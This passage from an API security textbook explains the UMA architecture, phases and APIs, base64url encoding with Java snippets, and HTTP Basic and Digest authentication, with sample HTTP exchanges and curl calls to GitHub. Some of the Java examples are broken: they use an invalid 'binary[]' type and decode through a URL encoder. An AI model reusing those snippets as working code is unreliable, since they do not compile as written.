the requested resource to the corresponding consumer. 7. The SP can cache the decision from the AM. Subsequent calls by the same consumer for the resource can utilize the cache instead of going to the AM. Figure D-5. The consumer accesses a resource hosted at the SP with valid OAuth credentials and with required privileges Appendix d UMA evolUtion 384 UMA and OAuth Over the years, ProtectServe evolved into UMA. ProtectServe used OAuth 1.0 to protect its APIs, and UMA moved from OAuth 1.0 to OAuth WRAP to OAuth 2.0. The UMA specification, which was developed under the Kantara Initiative for almost three years, was submitted to the IETF OAuth working group on July 9, 2011, as a draft recommendation for a user-managed data access protocol. UMA 1.0 Architecture The UMA architecture has five main components (see Figure D-6): the resource owner (analogous to the user in ProtectServe), the resource server (analogous to the service provider in ProtectServe), the authorization server (analogous to the authorization manager in ProtectServe), the client (analogous to the consumer in ProtectServe), and the requesting party. These five components interact with each other during the three phases as defined in the UMA core specification. Figure D-6. UMA high-level architecture Appendix d UMA evolUtion 385 UMA 1.0 Phases The first phase of UMA1 is to protect the resource. The resource owner initiates this phase by introducing the resource servers associated with him or her to a centralized authorization server. The client initiates the second phase when it wants to access a protected resource. The client talks to the authorization server and obtains the required level of authorization to access the protected resource that’s hosted in the resource server. Finally, in the third phase, the client directly accesses the protected resource. UMA Phase 1: Protecting a Resource Resources are owned by the resource owner and may be at different resource servers. Let’s look at an example. Suppose my photos are with Flickr, my calendar is with Google, and my friend list is with Facebook. How can I protect all these resources, which are distributed across different resource servers, with a centralized authorization server? The first step is to introduce the centralized authorization server to Flickr, Google, and Facebook—to all the resource servers. The resource owner must do this. The resource owner can log in to each resource server and provide the authorization server configuration endpoint to each of them. The authorization server must provide its configuration data in JSON format. The following is a set of sample configuration data related to the authorization server. The data in this JSON format should be understood by any of the resource servers that support UMA. This section digs into the details of each configuration element as you proceed: { "version":"1.0", "issuer":"https://auth.server.com", "pat_profiles_supported":["bearer"], "aat_profiles_supported":["bearer"], "rpt_profiles_supported":["bearer"], "pat_grant_types_supported":["authorization_code"], "aat_grant_types_supported":["authorization_code"], 1 https://docs.kantarainitiative.org/uma/rec-uma-core.html Appendix d UMA evolUtion 386 "claim_profiles_supported":["openid"], "dynamic_client_endpoint":"https://auth.server.com/dyn_client_reg_uri", "token_endpoint":"https://auth.server.com/token_uri", "user_endpoint":"https://auth.server.com/user_uri", "resource_set_registration_endpoint":"https://auth.server.com/rs/rsrc_uri", "introspection_endpoint":"https://auth.server.com/rs/status_uri", "permission_registration_endpoint":"https://auth.server.com/perm_uri", "rpt_endpoint":"https://auth.server.com/rpt", "authorization_request_endpoint":"https://auth.server.com/authorize" } Once the resource server is introduced to the authorization server via its configuration data endpoint, the resource server can talk to the dynamic client registration (RFC 7591) endpoint (dynamic_client_endpoint) to register it at the authorization server. The client registration endpoint exposed by the authorization server can be secured or not. It can be secured with OAuth, HTTP Basic authentication, Mutual TLS, or any other security protocol as desired by the authorization server. Even if the Dynamic Client Registration profile (RFC 7591) doesn’t enforce any authentication protocols over the registration endpoint, it must be secured with TLS. If the authorization server decides to allow the endpoint to be public and let anyone be registered, it can do so. To register a client, you have to pass all its metadata to the registration endpoint. Here’s a sample JSON message for client registration: POST /register HTTP/1.1 Content-Type: application/json Accept: application/json Host: authz.server.com { "redirect_uris":["https://client.org/callback","https://client.org/ callback2"], "token_endpoint_auth_method":"client_secret_basic", "grant_types": ["authorization_code" , "implicit"], "response_types": ["code" , "token"], } Appendix d UMA evolUtion 387 A successful client registration results in the following JSON response, which includes the client identifier and the client secret to be used by the resource server: HTTP/1.1 200 OK Content-Type: application/json Cache-Control: no-store Pragma: no-cache { "client_id":"iuyiSgfgfhffgfh", "client_secret": "hkjhkiiu89hknhkjhuyjhk", "client_id_issued_at":2343276600, "client_secret_expires_at":2503286900, "redirect_uris":["https://client.org/callback","https://client.org/ callback2"], "grant_types": "authorization_code", "token_endpoint_auth_method": "client_secret_basic", } Note You aren’t required to use the dynamic Client Registration Api. Resource servers can use any method they prefer to register at the authorization server. the registration at the authorization server is one-time operation, not per resource owner. if a given resource server has already been registered with a given authorization server, then it doesn’t need to register again at the authorization server when the same authorization server is introduced by a different resource owner. Once the initial resource server registration process is complete, the next step in the first phase is for the resource server to obtain a Protection API token (PAT) to access the Protection API exposed by the authorization server. (You learn more on PAT in the section “Protection API,” later in the appendix.) PAT is issued per resource server, per resource owner. In other words, each resource owner must authorize a PAT so the resource server can use it to protect resources with the centralized authorization server. The authorization server configuration file declares the types of PATs it supports. In the previous example, the authorization server supports OAuth 2.0 bearer tokens: Appendix d UMA evolUtion 388 pat_profiles_supported":["bearer"] In addition to the PAT token type, the authorization server configuration file also declares the way to obtain the PAT. In this case, it should be via the OAuth 2.0 authorization code grant type. The resource server must initiate an OAuth flow with the authorization code grant type to obtain the PAT in bearer format: "pat_grant_types_supported":["authorization_code"] Note the scope of the pAt token must be http://docs. kantarainitiative.org/uma/scopes/prot.json. this must be included in the scope value of the authorization code grant request. The following is a sample authorization code grant request to obtain a PAT: GET /authorize?response_type=code &client_id=dsdasDdsdsdsdsdas &state=xyz &redirect_uri=https://flickr.com/callback &scope=http://docs.kantarainitiative.org/uma/scopes/prot.json HTTP/1.1 Host: auth.server.com Once the resource server gets the PAT, it can be used to access the Resource Set Registration API exposed by the authorization server, to register a set of resources that needs to be protected by the given authorization server. The endpoint of the Resource Set Registration API is defined under the authorization server configuration file (you learn more about the Resource Set Registration API in the section “Protection API”): "resource_set_registration_endpoint":"https://auth.server.com/rs/rsrc_uri", UMA Phase 2: Getting Authorization According to the UMA specification, phase 2 begins after a failed access attempt by the client. The client tries to access a resource hosted in the resource server and gets an HTTP 403 status code (see Figure D-7). In addition to the 403 response, the resource server includes the endpoint (as_uri) of the corresponding authorization server where the client can obtain a requesting party token (RPT): Appendix d UMA evolUtion 389 HTTP/1.1 403 Forbidden WWW-Authenticate: UMA realm="my-realm", host_id="photos.flickr.com", as_uri=https://auth.server.com According to UMA, to access a protected resource, the client must present a valid RPT. (You learn more about RPT in the section “Authorization API.") The RPT endpoint that must be included in the 403 response is declared in the authorization server configuration file: "rpt_endpoint":"https://auth.server.com/rpt” Once rejected by the resource server with a 403, the client has to talk to the RPT endpoint of the authorization server. To do so, the client must have an Authorization API token (AAT). To get an AAT, the client must be registered at the corresponding authorization server. The client can use the OAuth Dynamic Client Registration API or any other way it prefers to register. After it’s registered with the authorization server, the client gets a client key and a client secret. The requesting party can be a different entity from the client. For example, the client can be a mobile application or a web application, whereas the requesting party could be a human user who uses either the mobile application or the web application. The ultimate goal is for the requesting party to access an API owned by a resource owner, hosted in a resource server, via a client application. To achieve this, the requesting party should get an RPT from an authorization server trusted by the resource server. To get an RPT, the requesting party should first get an AAT via the client application. To get an AAT, the client must follow an OAuth grant type supported by the authorization server to issue AATs. That is declared in the authorization server’s configuration file. In this case, the authorization server supports the authorization code grant type to issue AATs: "aat_grant_types_supported":["authorization_code"] Appendix d UMA evolUtion 390 Once the client is registered at the authorization server, to get an AAT on behalf of the requesting party, it must initiate the OAuth authorization code grant type flow, with the scope: http://docs.kantarainitiative.org/uma/scopes/authz.json. The following is a sample authorization code grant request to obtain an AAT: GET /authorize?response_type=code &client_id=dsdasDdsdsdsdsdas &state=xyz &redirect_uri=https://flickr.com/callback &scope=http://docs.kantarainitiative.org/uma/scopes/authz.json HTTP/1.1 Host: auth.server.com Note You aren’t required to use the dynamic Client Registration Api. the client can use any method it prefers to register at the authorization server. the registration at the authorization server is one-time operation and not per resource server or per requesting party. if a given client has already been registered with a given authorization server, then it doesn’t need to register again when a different requesting party uses the same authorization server. the AAt is per client per requesting party per authorization server and is independent from the resource server. Once you have the AAT, upon the 403 response from the resource server, the client can talk to the authorization server’s RPT endpoint and get the corresponding RPT (see Figure D-8). To get an RPT, the client must authenticate with the AAT. In the following Figure D-7. The resource server rejects any request without an RPT Appendix d UMA evolUtion 391 example, the AAT is used in the HTTP Authorization header as an OAuth 2.0 bearer token: POST /rpt HTTP/1.1 Host: as.example.com Authorization: Bearer GghgjhsuyuE8heweds Note the Rpt endpoint is defined under the rpt_endpoint attribute of the authorization server’s configuration. The following shows a sample response from the RPT endpoint of the authorization server. If this is the first issuance of the RPT, it doesn’t have any authorization rights attached. It can only be used as a temporary token to get the “real” RPT: HTTP/1.1 201 Created Content-Type: application/json { "rpt": "dsdsJKhkiuiuoiwewjewkej" } When the client is in possession of the initial RPT, it can once again try to access the resource. In this case, the RPT goes as an OAuth 2.0 bearer token in the HTTP Authorization header. Now the resource server extracts the RPT from the resource request and talks to the Introspection API exposed by the authorization server. The Introspection API can tell whether the RPT is valid and, if it is, the permissions associated with it. In this case, because you’re still using the initial RPT, there are no permissions associated with it, even though it’s a valid token. Note the introspection Api exposed by the authorization server is oAuth 2.0 protected. the resource server must present a valid pAt to access it. the pAt is another bearer token that goes in the Http Authorization header. If the RPT doesn’t have enough permission to access the resource, the resource server talks to the Client Requested Permission Registration API exposed by the authorization server and registers the required set of permissions to access the desired Appendix d UMA evolUtion 392 resource. When permission registration is successfully completed, the authorization server returns a permission ticket identifier. Note the Client Requested permission Registration endpoint is defined under the permission_registration_endpoint attribute in the authorization server’s configuration. this endpoint, which is part of the UMA protection Api, is secured with oAuth 2.0. the resource server must present a valid pAt to access the Api. The following is a sample request to the permission registration endpoint of the authorization server. It must include a unique resource_set_id corresponding to the requested resource and the required set of scopes associated with it: POST /perm_uri HTTP/1.1 Content-Type: application/json Host: auth.server.com { "resource_set_id": "1122wqwq23398100", "scopes": [ "http://photoz.flickr.com/dev/actions/view", "http://photoz.flickr.com/dev/actions/all" ] } In response to this request, the authorization server generates a permission ticket: HTTP/1.1 201 Created Content-Type: application/json {"ticket": "016f88989-f9b9-11e0-bd6f-0cc66c6004de"} When the permission ticket is created at the authorization server, the resource server sends the following response to the client: HTTP/1.1 403 Forbidden WWW-Authenticate: UMA realm="my-realm", host_id=" photos.flickr.com ", as_uri="https://auth.server.com" error="insufficient_scope" Appendix d UMA evolUtion 393 {"ticket": "016f88989-f9b9-11e0-bd6f-0cc66c6004de"} Now the client has to get a new RPT with the required set of permissions. Unlike in the previous case, this time the RPT request also includes the ticket attribute from the previous 403 response: POST /rpt HTTP/1.1 Host: as.example.com Authorization: Bearer GghgjhsuyuE8heweds { "rpt": "dsdsJKhkiuiuoiwewjewkej", "ticket": "016f88989-f9b9-11e0-bd6f-0cc66c6004de" } Note the Rpt endpoint of the authorization server is secured with oAuth 2.0. to access the Rpt endpoint, the client must use an AAt in the Http Authorization header as the oAuth bearer token. At this point, prior to issuing the new RPT to satisfy the requested set of permissions, the authorization server evaluates the authorization policies set by the resource owner against the client and the requesting party. If the authorization server needs more information regarding the requesting party while evaluating the policies, it can interact directly with the requesting party to gather the required details. Also, if it needs further approval by the resource owner, the authorization server must notify the resource owner and wait for a response. In any of these cases, once the authorization server decides to associate permissions with the RPT, it creates a new RPT and sends it to the client: HTTP/1.1 201 Created Content-Type: application/json {"rpt": "dsdJhkjhkhk879dshkjhkj877979"} Appendix d UMA evolUtion 394 UMA Phase 3: Accessing the Protected Resource At the end of phase 2, the client got access to a valid RPT with the required set of permissions. Now the client can use it to access the protected resource. The resource server again uses the Introspection API exposed by the authorization server to check the validity of the RPT. If the token is valid and has the required set of permissions, the corresponding resource is returned to the client. UMA APIs UMA defines two main APIs: the Protection API and the Authorization API (see Figure D-9). The Protection API sits between the resource server and the authorization server, and the Authorization API sits between the client and the authorization server. Both APIs are secured with OAuth 2.0. To access the Protection API, the resource server must present a PAT as the bearer token; and to access the Authorization API, the client must present an AAT as the bearer token. Figure D-8. The client gets an authorized RPT from the authorization server Appendix d UMA evolUtion 395 Protection API The Protection API is the interface exposed to the resource server by the authorization server. It consists of three subelements: the OAuth Resource Set Registration endpoint,2 the Client Requested Permission Registration endpoint, and the OAuth Token Introspection (RFC 7662) endpoint. These three APIs that fall under the Protection API address different concerns. The resource server uses the Resource Set Registration API to publish semantics and discovery properties of its resources to the authorization server. The resource server does this in an ongoing manner. Whenever it finds a resource set that needs to be protected by an external authorization server, it talks to the corresponding Resource Set Registration endpoint to register new resources. This action can be initiated by the resource server itself or by the resource owner. The following example shows a JSON request to the Resource Set Registration API of the authorization server. The value of the name attribute should be human-readable text, and the optional icon_uri can point to any image that represents this resource set. The scope array should list all the scope values required to 2 The latest draft of the OAuth Resource Set Registration specification is available at https://tools.ietf.org/html/draft-hardjono-oauth-resource-reg-07 Figure D-9. UMA APIs Appendix d UMA evolUtion 396 access the resource set. The type attribute describes the semantics associated with the resource set; the value of this attribute is meaningful only to the resource server and can be used to process the associated resources: { "name": "John’s Family Photos", "icon_uri": "http://www.flickr.com/icons/flower.png", "scopes": [ "http://photoz. flickr.com/dev/scopes/view", "http://photoz. flickr.com/dev/scopes/all" ], "type": "http://www. flickr.com/rsets/photoalbum" } This JSON message is also known as the resource description. Each UMA authorization server must present a REST API to create (POST), update (PUT), list (GET), and delete (DELETE) resource set descriptions. The resource server can utilize this endpoint either during phase 1 or in an ongoing manner. The resource server accesses the Client Requested Permission Registration endpoint during phase 2 of UMA flow. The resource server uses this API to inform the authorization server about the level of permissions required for the client to access the desired resource. The resource server uses the Introspection API to check the validity of the RPT. Authorization API The Authorization API is the interface between the client and the authorization server. The main responsibility of this API is to issue RPTs. Appendix d UMA evolUtion 397 © Prabath Siriwardena 2020 P. Siriwardena, Advanced API Security, https://doi.org/10.1007/978-1-4842-2050-4_20 APPENDIX E Base64 URL Encoding Base64 encoding defines how to represent binary data in an ASCII string format. The objective of base64 encoding is to transmit binary data such as keys or digital certificates in a printable format. This type of encoding is needed if these objects are transported as part of an email body, a web page, an XML document, or a JSON document. To do base64 encoding, first the binary data are grouped into 24-bit groups. Then each 24-bit group is divided into four 6-bit groups. Now, a printable character can represent each 6-bit group based on its bit value in decimal (see Figure E-1). For example, the decimal value of the 6-bit group 000111 is 7. As per Figure E-1, the character H represents this 6-bit group. Apart from the characters shown in Figure E-1, the character = is used to specify a special processing function, which is to pad. If the length of the original binary data is not an exact multiple of 24, then we need padding. Let’s say the length is 232, which is not a multiple of 24. Now we need to pad this binary data to make its length equal to the very next multiple of the 24, which is 240. In other words, we need to pad this binary data by 8 to make its length 240. In this case, padding is done by adding eight 0s to the end of the binary data. Now, when we divide this 240 bits by 6 to build 6-bit groups, the last 6-bit group will be of all zeros—and this complete group will be represented by the padding character =. 398 The following example shows how to base64-encode/decode binary data with Java 8. The java.util.Base64 class was introduced from Java 8. byte[] binaryData = // load binary data to this variable // encode String encodedString = Base64.getEncoder().encodeToString(binaryData); // decode binary[] decodedBinary = Base64.getDecoder().decode(encodedString); One issue with base64 encoding is that it does not work quite well with URLs. The + and / characters in base64 encoding (see Figure E-1) have a special meaning when used within a URL. If we try to send a base64-encoded image as a URL query parameter and if the base64-encoded string carries any of the preceding two characters, then the browser will interpret the URL in a wrong way. The base64url encoding was introduced to address this problem. The way base64url encoding works is exactly the same as base64 encoding other than two exceptions: the character - is used in base64url encoding instead of the character + in base64 encoding, and the character _ is used in base64url encoding instead of the character / in base64 encoding. Figure E-1. Base64 encoding Appendix e BAse64 URL encoding 399 The following example shows how to base64url-encode/decode binary data with Java 8. The java.util.Base64 class was introduced from Java 8. byte[] binaryData = // load binary data to this variable // encode String encodedString = Base64.getUrlEncoder().encodeToString(binaryData); // decode binary[] decodedBinary = Base64.getUrlEncoder().decode(encodedString); Appendix e BAse64 URL encoding 401 © Prabath Siriwardena 2020 P. Siriwardena, Advanced API Security, https://doi.org/10.1007/978-1-4842-2050-4_21 APPENDIX F Basic/Digest Authentication HTTP Basic authentication and Digest authentication are two authentication schemes, used for protecting resources on the Web. Both are based on username- and password- based credentials. When trying to log in to a web site, if the browser presents you a dialog box asking your username and password, then most probably this web site is protected with HTTP Basic or Digest authentication. Asking the browser to challenge the user to authenticate is one of the quick and dirty ways of protecting a web site. None or at least very few web sites on the Internet today use HTTP Basic or Digest authentication. Instead, they use a nice form-based authentication or their own custom authentication schemes. But still some use HTTP Basic/Digest authentication to secure direct API-level access to resources on the Web. HTTP Basic authentication is first standardized through the HTTP/1.0 RFC (Request For Comments)1 by IETF (Internet Engineering Task Force). It takes the username and password over the network as an HTTP header in cleartext. Passing user credentials over the wire in cleartext is not secure, unless it’s used over a secured transport channel, like HTTP over TLS (Transport Layer Security). This limitation was addressed in the RFC 2617, which defined two authentication schemes for HTTP: Basic Access Authentication and Digest Access Authentication. Unlike Basic authentication, the Digest authentication is based on cryptographic hashes and never sends user credentials over the wire in cleartext. 1 Hypertext Transfer Protocol—HTTP/1.0, www.rfc-base.org/txt/rfc-1945.txt 402 HTTP Basic Authentication The HTTP/1.0 specification first defined the scheme for HTTP Basic authentication and got further refined by RFC 2617. The RFC 2617 was proposed as a companion to the HTTP 1.1 specification or the RFC 2616.2 Then again in 2015, the RFC 2617 was obsoleted by the new RFC 7617. It’s a challenge-response-based authentication scheme, where the server challenges the user to provide valid credentials to access a protected resource. With this model, the user has to authenticate him for each realm. The realm can be considered as a protection domain. A realm allows the protected resources on a server to be partitioned into a set of protection spaces, each with its own authentication scheme and/or authorization database.3 A given user can belong to multiple realms simultaneously. The value of the realm is shown to the user at the time of authentication—it’s part of the authentication challenge sent by the server. The realm value is a string, which is assigned by the authentication server. Once the request hits the server with Basic authentication credentials, the server will authenticate the request only if it can validate the username and the password, for the protected resource, against the corresponding realm. ACCESSING THE GITHUB API WITH HTTP BASIC AUTHENTICATION GitHub is a web-based git repository hosting service. Its REST API4 is protected with HTTP Basic authentication. This exercise shows you how to access the secured GitHub API to create a git repository. You need to have a GitHub account to try out the following, and in case you do not have one, you can create an account from https://github.com. Let’s try to invoke the following GitHub API with cURL. It’s an open API that doesn’t require any authentication and returns pointers to all available resources, corresponding to the provided GitHub username. \> curl -v https://api.github.com/users/{github-user} For example: \> curl -v https://api.github.com/users/prabath 2 Hypertext Transfer Protocol—HTTP/1.1, www.ietf.org/rfc/rfc2616.txt 3 HTTP Authentication: Basic and Digest Access Authentication, www.ietf.org/rfc/rfc2617.txt 4 GitHub REST API, http://developer.github.com/v3/ APPEndIx F BASIc/dIGEST AUTHEnTIcATIon 403 The preceding command returns back the following JSon response. { "login":"prabath", "id":1422563, "avatar_url":"https://avatars.githubusercontent.com/u/1422563?v=3", "gravatar_id":"", "url":"https://api.github.com/users/prabath", "html_url":"https://github.com/prabath", "followers_url":"https://api.github.com/users/prabath/followers", "following_url":"https://api.github.com/users/prabath/following {/other_user}", "gists_url":"https://api.github.com/users/prabath/gists{/gist_id}", "starred_url":"https://api.github.com/users/prabath/starred{/owner} {/repo}", "subscriptions_url":"https://api.github.com/users/prabath/subscriptions", "organizations_url":"https://api.github.com/users/prabath/orgs", "repos_url":"https://api.github.com/users/prabath/repos", "events_url":"https://api.github.com/users/prabath/events{/privacy}", "received_events_url":"https://api.github.com/users/prabath/received_ events", "type":"User", "site_admin":false, "name":"Prabath Siriwardena", "company":"WSO2", "blog":"http://blog.faciellogin.com", "location":"San Jose, CA, USA", "email":"prabath@apache.org", "hireable":null, "bio":null, "public_repos":3, "public_gists":1, "followers":0, "following":0, "created_at":"2012-02-09T10:18:26Z", "updated_at":"2015-11-23T12:57:36Z" } APPEndIx F BASIc/dIGEST AUTHEnTIcATIon 404 Note All the cURL commands used in this book are broken into multiple lines just for clarity. When you execute them, make sure to have it as a single line, with no line breaks. now let’s try out another API. Here you create a GitHub repository with the following API call. This returns a negative response with the HTTP status code 401 Unauthorized. The API is secured with HTTP Basic authentication, and you need to provide credentials to access it: \> curl -i -X POST -H 'Content-Type: application/x-www-form-urlencoded' -d '{"name": "my_github_repo"}' https://api.github.com/user/repos The preceding command returns back the following HTTP response, indicating that the request is not authenticated. observing the response from GitHub for the unauthenticated API call to create a repository, it looks as though the GitHub API isn’t fully compliant with the HTTP 1.1 specification. According to the HTTP 1.1 specification, whenever the server returns a 401 status code, it also must return the HTTP header WWW-Authenticate. HTTP/1.1 401 Unauthorized Content-Type: application/json; charset=utf-8 Content-Length: 115 Server: GitHub.com Status: 401 Unauthorized { "message": "Requires authentication", "documentation_url": "https://developer.github.com/v3/repos/#create" } Let’s invoke the same API with proper GitHub credentials. Replace $GitHubUserName and $GitHubPassword with your credentials: curl -i –v -u $GitHubUserName:$GitHubPassword -X POST -H 'Content-Type: application/x-www-form-urlencoded' -d '{"name": "my_github_repo"}' https://api.github.com/user/repos next, let’s look at the HTTP request generated from the cURL client: POST /user/repos HTTP/1.1 Authorization: Basic cHJhYmF0aDpwcmFiYXRoMTIz APPEndIx F BASIc/dIGEST AUTHEnTIcATIon 405 The HTTP Authorization header in the request is generated from the username and password you provided. The formula is simple: Basic Base64Encode(username:password). Any base64-encoded text is no better than cleartext—it can be decoded quite easily back to the cleartext. That is why Basic authentication on plain HTTP isn’t secured. It must be used in conjunction with a secured transport channel, like HTTPS. The preceding command returns back the following HTTP response (truncated for clarity), indicating that the git repository was created successfully. HTTP/1.1 201 Created Server: GitHub.com Content-Type: application/json; charset=utf-8 Content-Length: 5261 Status: 201 Created { "id": 47273092, "name": "my_github_repo", "full_name": "prabath/my_github_repo" } Note To add HTTP Basic authentication credentials to a request generated from a cURL client, you can use the option –u username:password. This creates the base64- encoded HTTP basic authorization header. –i is used to include HTTP headers in the output, and –v is used to run cURL in verbose mode. –H is used to set HTTP headers in the outgoing request, and –d is used to post data to the endpoint. APPEndIx F BASIc/dIGEST AUTHEnTIcATIon 406 HTTP Digest Authentication HTTP Digest authentication was initially proposed by the RFC 20695 as an extension to the HTTP/1.0 specification to overcome certain limitations in HTTP Basic authentication. Later this specification was made obsolete by the RFC 2617. The RFC 2617 removed some optional elements specified by the RFC 2069 due to problems found since its publication and introduced a set of new elements for compatibility, and those new elements have been made optional. Digest authentication is an authentication scheme based on a challenge-response model, which never sends the user credentials over the wire. Because the credentials are never sent over the wire with the request, Transport Layer Security (TLS) isn’t a must. Anyone intercepting the traffic won’t be able to discover the password in cleartext. To initiate Digest authentication, the client has to send a request to the protected resource with no authentication information, which results in a challenge (in the response). The following example shows how to initiate a Digest authentication handshake from cURL (this is just an example, don’t try it till we set up the cute-cupcake sample later in this appendix): \> curl -k –-digest –u userName:password -v https://localhost:8443/recipe Note To add HTTP digest authentication credentials to a request generated from a cURL client, use the option –-digest –u username: password. Let’s look at the HTTP headers in the response. The first response is a 4016 with the HTTP header WWW-Authenticate, which in fact is the challenge: HTTP/1.1 401 Unauthorized WWW-Authenticate: Digest realm="cute-cupcakes.com", qop="auth", nonce="1390781967182:c2db4ebb26207f6ed38bb08eeffc7422", opaque="F5288F4526B8EAFFC4AC79F04CA8A6ED" 5 An Extension to HTTP: Digest Access Authentication, www.ietf.org/rfc/rfc2069.txt 6 The 401 HTTP status code is returned back in the HTTP response when the request is not authenticated to access the corresponding resource. All HTTP/1.1 status codes are defined here: www.w3.org/Protocols/rfc2616/rfc2616-sec10.html APPEndIx F BASIc/dIGEST AUTHEnTIcATIon 407 Note You learn more about the Recipe API and how to deploy it locally as you proceed through this appendix. The “Securing the Recipe API with HTTP digest Authentication” exercise at the end of the appendix explains how to secure an API with digest authentication. The challenge from the server consists of the following key elements. Each of these elements is defined in the RFC 2617: • realm: A string to be displayed to users so they know which username and password to use. This string should contain at least the name of the host performing the authentication and may additionally indicate the collection of users who may have access. • domain: This is an optional element, not present in the preceding response. It’s a comma-separated list of URIs. The intent is that the client could use this information to know the set of URIs for which the same authentication information should be sent. The URIs in this list may exist on different servers. If this keyword is omitted or empty, the client should assume that the domain consists of all URIs on the responding server. • nonce: A server-specified data string, which should be uniquely generated each time a 401 response is made. The value of the nonce is implementation dependent and is opaque to the client. The client should not try to interpret the value of nonce. • opaque: A string of data, specified by the server, that should be returned by the client unchanged in the Authorization header of subsequent requests with URIs in the same protection space (which is the realm). Because the client is returning back the value of the opaque element given to it by the server for the duration of a session, the opaque data can be used to transport authentication session state information or can be used as a session identifier. • stale: A flag, indicating that the previous request from the client was rejected because the nonce value was stale. If stale is TRUE (case insensitive), the client may wish to simply retry the request with a APPEndIx F BASIc/dIGEST AUTHEnTIcATIon 408 new nonce value, without reprompting the user for a new username and password. The server should only set stale to TRUE if it receives a request for which the nonce is invalid but with a valid digest for that nonce (indicating that the client knows the correct username/ password). If stale is FALSE, or anything other than TRUE, or the stale directive is not present, the username and/or password are invalid, and new values must be obtained. This flag is not shown in the preceding response. • algorithm: This is an optional element, not shown in the preceding response. The value of algorithm is a string indicating a pair of algorithms used to produce the digest and a checksum. If the client does not understand the algorithm, the challenge should be ignored, and if it is not present, it is assumed to be MD5. • qop: The quality of protection options applied to the response by the server. The value auth indicates authentication; while the value auth-int indicates authentication with integrity protection. This is an optional element and introduced to be backward compatible with the RFC 2069. Once the client gets the response from the server, it has to respond back. Here’s the HTTP request with the response to the challenge: Authorization: Digest username="prabath", realm="cute-cupcakes.com", nonce="1390781967182:c2db4ebb26207f6ed38bb08eeffc7422", uri="/recipe", cnonce="MTM5MDc4", nc=00000001, qop="auth", response="f5bfb64ba8596d1b9ad1514702f5a062", opaque="F5288F4526B8EAFFC4AC79F04CA8A6ED" The following are the key elements in the response from the client: • username: The unique identifier of the user who’s going to invoke the API. • realm/qop/nonce/opaque: The same as in the initial challenge from the server. The value of qop indicates what quality of protection the client has applied to the message. If present, its value MUST be one of the alternatives the server indicated it supports in the WWW- Authenticate header. APPEndIx F BASIc/dIGEST AUTHEnTIcATIon 409 • cnonce: This MUST be specified if a qop directive is sent and MUST NOT be specified if the server did not send a qop directive in the WWW-Authenticate header field. The value of cnonce is an opaque quoted string value provided by the client and used by both the client and the server to avoid chosen plaintext attacks,7 to provide mutual authentication, and to provide some message integrity protection. This is not shown in the preceding response. • nc: This MUST be specified if a qop directive is sent and MUST NOT be specified if the server did not send a qop directive in the WWW- Authenticate header field. The value of nc is the hexadecimal count of the number of requests (including the current request) that the client has sent with the same nonce value. For example, in the first request sent in response to a given nonce value, the client sends "nc=00000001". The purpose of this directive is to allow the server to detect request replays by maintaining its own copy of this count—if the same nc value is seen twice for the same nonce value, then the request is a replay. • digest-uri: The request URI from the request line. Duplicated here because proxies are allowed to change the Request-Line in transit. The value of the digest-uri is used to calculate the value of the response element, as explained later in the chapter. • auth-param: This is an optional element not shown in the preceding response. It allows for future extensions. The server MUST ignore any unrecognized directive. • response: The response to the challenge sent by the server, calculated by the client. The following section explains how the value of response is calculated. 7 Chosen plaintext attack is an attack model where the attacker has access to both the encrypted text and the corresponding plaintext. The attacker can specify his own plaintext and get it encrypted or signed by the server. Further he can carefully craft the plaintext to learn characteristics about the encryption/signing algorithm. For example, he can start with an empty text, a text with one letter, with two letters likewise, and get corresponding encrypted/signed text. This kind of an analysis on encrypted/signed text is known as cryptanalysis. APPEndIx F BASIc/dIGEST AUTHEnTIcATIon 410 The value of response is calculated in the following manner. Digest authentication supports multiple algorithms. RFC 2617 recommends using MD5 or MD5-sess (MD5- session). If no algorithm is specified in the server challenge, MD5 is used. Digest calculation is done with two types of data: security-related data (A1) and message- related data (A2). If you use MD5 as the hashing algorithm or if it is not specified, then you define security-related data (A1) in the following manner: A1 = username:realm:password If you use MD5-sess as the hashing algorithm, then you define security-related data (A1) in the following manner. cnonce is an opaque quoted string value provided by the client and used by both the client and the server to avoid chosen plaintext attacks. The value of nonce is the same as in the server challenge. If the MD5-sess is picked as the hashing algorithm, then A1 is calculated only once on the first request by the client following receipt of a WWW-Authenticate challenge from the server: A1 = MD5 (username:realm:password):nonce:cnonce RFC 2617 defines message-related data (A2) in two ways, based on the value of qop in the server challenge. If the value is auth or undefined, then the message-related data (A2) is defined in the following manner. The value of the request-method element can be GET, POST, PUT, DELETE, or any HTTP verb, and the value of the uri-directive-value element is the request URI from the request line: A2 = request-method:uri-directive-value If the value of qop is auth-int, then you need to protect the integrity of the message, in addition to authenticating. A2 is derived in the following manner. When you have MD5 or MD5-sess as the hashing algorithm, the value of H is MD5: A2 = request-method:uri-directive-value:H(request-entity-body) The final value of the digest is calculated in the following way, based on the value of qop. If qop is set to auth or auth-int, then the final digest value is as shown next. The nc value is the hexadecimal count of the number of requests (including the current request) that the client has sent with the nonce value in this request. This directive helps the server detect replay attacks. The server maintains its own copy of nonce and the nonce count (nc); if any are seen twice, that indicates a possible replay attack: MD5(MD5(A1):nonce:nc:cnonce:qop:MD5(A2)) APPEndIx F BASIc/dIGEST AUTHEnTIcATIon 411 If qop is undefined, then the final digest value is MD5(MD5(A1):<nonce>:MD5(A2)) This final digest value will be set as the value of the response element in the HTTP request from the client to the server. Once the client responds back to the server’s initial challenge, the subsequent requests from there onward do not need all the preceding three message flows (the initial unauthenticated request from the client, the challenge from the server, and the response to the challenge from the client). The server will send a challenge to the client only if there is no valid authorization header in the request. Once the client gets the initial challenge, for the subsequent requests, the same parameters from the challenge will be used. In other words, the response by the client to a WWW- Authenticate challenge from the server for a protection space starts an authentication session with that protection space. The authentication session lasts until the client receives another WWW-Authenticate challenge from any server in the protection space. The client should remember the username, password, nonce, nonce count, and opaque values associated with the authentication session to use to construct the authorization header in the subsequent requests within that protection space. For example, the authorization header from the client should have the nonce value in each request. This nonce value is picked from the initial challenge from the server, but the value of the nc element will be increased by one, for each request. Table F-1 provides a comparison between HTTP Basic authentication and Digest authentication. Table F-1. HTTP Basic Authentication vs. HTTP Digest Authentication HTTP Basic Authentication HTTP Digest Authentication Sends credentials in cleartext over the wire. credentials are never sent in cleartext. A digest derived from the cleartext password is sent over the wire. Should be used in conjunction with a secured transport channel, like HTTPS. doesn’t depend on the security of the underneath transport channel. only performs authentication. can be used to protect the integrity of the message, in addition to authentication (with qop=auth-int). User store can store passwords as a salted hash. User store should store passwords in cleartext or should store the hash value of username:realm: password. APPEndIx F BASIc/dIGEST AUTHEnTIcATIon 412 Note With HTTP digest authentication, a user store has to store passwords either in cleartext or as the hashed value of username:password:realm. This is required because the server has to validate the 